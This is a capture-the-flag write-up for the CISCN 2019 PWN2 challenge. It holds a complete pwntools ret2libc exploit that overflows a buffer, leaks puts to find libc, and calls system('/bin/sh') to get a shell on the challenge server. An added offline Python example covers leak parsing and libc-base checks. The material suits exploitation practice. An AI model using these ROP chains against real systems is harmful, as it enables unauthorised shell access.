[CISCN 2019东北]PWN2 https://www.nssctf.cn/problem/95
```python
from pwn import *
from LibcSearcher import *

context.log_level = "debug"

p = remote("node5.anna.nssctf.cn", 21739)
elf = ELF("/home/pwn/10ret2libc64_ciscn/ciscn_2019_pwn2")

# Addresses taken from the binary itself (no PIE), so they are fixed.
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
encrypt_addr = elf.sym["encrypt"]
ret_addr = 0x4006b9  # plain `ret` gadget, used only to realign the stack
rdi_addr = 0x400c83  # `pop rdi; ret` gadget

# Stage 1: overflow the 0x58-byte buffer, call puts(puts@got) to leak the
# libc address of puts, then return into encrypt so we get a second overflow.
payload = b'a' * 0x58 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr)
p.recvuntil("Input your choice!".encode())
p.sendline("1".encode())
p.recvuntil('Input your Plaintext to be encrypted\n'.encode())
p.sendline(payload)

# A userland pointer prints as 6 significant bytes ending in 0x7f; read up to
# that byte, keep the last 6, and zero-extend to 8 before unpacking.
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr -> {:#x}'.format(puts_addr))

# Resolve the remote libc from the leaked puts address and compute the rest.
libc = LibcSearcher("puts", puts_addr)
libc_addr = puts_addr - libc.dump("puts")
bin_sh_addr = libc_addr + libc.dump("str_bin_sh")
system_addr = libc_addr + libc.dump("system")
success('libc_addr -> {:#x}'.format(libc_addr))
success('bin_sh_addr -> {:#x}'.format(bin_sh_addr))
success('system_addr -> {:#x}'.format(system_addr))

# Stage 2: the chain above returned into encrypt, so the prompt reappears
# without choosing "1" again. The leading `ret` keeps rsp 16-byte aligned
# when system() is entered (it contains a movaps that faults otherwise).
payload = b'a' * 0x58 + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
p.recvuntil("Input your Plaintext to be encrypted\n".encode())
p.sendline(payload)
p.interactive()
```
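The two steps the script above depends on, pulling the 6-byte puts leak out of the target's output and turning it into a libc base, are shown below as an added Python example; it is not part of the original writeup and uses only `struct`, so it runs offline against a constructed output sample. The leaked address 0x7ffff7a649c0, the puts offset 0x809c0 (the glibc 2.27 Ubuntu value, used only as an illustration) and the gadget addresses passed to the payload builders are assumptions. It adds the sanity check the script skips: the low 12 bits of the leaked puts must equal those of the offset from the libc you think the target runs, and the resulting base must be page aligned. This is the same low-12-bit matching LibcSearcher performs when it lists candidate libcs, and it catches most cases of computing offsets against the wrong libc build.

```python
import struct

# Constructed sample of the target's output after the first ROP chain runs:
# some echoed text, then puts(puts@got) prints the 6 significant bytes of a
# libc pointer (little-endian, top byte 0x7f) followed by puts' own newline.
# LEAKED_PUTS is a made-up address chosen for this example.
LEAKED_PUTS = 0x7ffff7a649c0
SAMPLE_OUTPUT = b"some echoed text\n" + struct.pack("<Q", LEAKED_PUTS)[:6] + b"\n"

# Hypothetical symbol offset for one libc build (glibc 2.27 Ubuntu puts);
# substitute the offset of the libc the target actually runs.
PUTS_OFFSET = 0x809c0
PAD = 0x58  # bytes from the start of the buffer to the saved return address


def extract_leak(raw: bytes) -> int:
    """Equivalent of u64(p.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')).

    Like recvuntil, this stops at the FIRST 0x7f byte, so echoed data that
    happens to contain 0x7f would be misparsed; consume a fixed delimiter
    first if the target echoes attacker-controlled bytes before the leak.
    """
    end = raw.index(0x7f) + 1
    if end < 6:
        raise ValueError("fewer than 6 bytes before the 0x7f byte")
    return struct.unpack("<Q", raw[end - 6:end].ljust(8, b"\x00"))[0]


def libc_base(leaked_puts: int, puts_offset: int) -> int:
    """Derive the libc base and sanity-check it against the chosen libc build."""
    # libc is mapped page aligned, so the low 12 bits of a symbol are fixed
    # per build; a mismatch means the offset belongs to a different libc.
    if (leaked_puts & 0xfff) != (puts_offset & 0xfff):
        raise ValueError("low 12 bits of leak and offset differ: wrong libc")
    base = leaked_puts - puts_offset
    if base & 0xfff:
        raise ValueError("libc base is not page aligned")
    return base


def leak_chain(pop_rdi: int, puts_got: int, puts_plt: int, back_to: int) -> bytes:
    """pop rdi; ret -> puts@got -> puts@plt -> back into the vulnerable
    function, so a second overflow is possible after the leak."""
    return b"a" * PAD + struct.pack("<QQQQ", pop_rdi, puts_got, puts_plt, back_to)


def system_chain(ret: int, pop_rdi: int, bin_sh: int, system: int) -> bytes:
    """ret -> pop rdi; ret -> "/bin/sh" -> system. The leading ret gadget
    keeps rsp 16-byte aligned at system's movaps, which otherwise faults."""
    return b"a" * PAD + struct.pack("<QQQQ", ret, pop_rdi, bin_sh, system)


if __name__ == "__main__":
    puts = extract_leak(SAMPLE_OUTPUT)
    base = libc_base(puts, PUTS_OFFSET)
    print(f"puts @ {puts:#x}, libc base @ {base:#x}")
```

When the check in `libc_base` fails locally but the same offsets work remotely, the local libc is a different build from the remote one, and the fix is to point the script at the target's libc (or at the offsets LibcSearcher selected for the remote leak) rather than the one installed on the attacking machine.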
The script above works against the remote target but does not work locally. It is probably a problem with my local libc version; I was too lazy to debug it and will run it once I have learned libc. I am not going to look at pwn any more.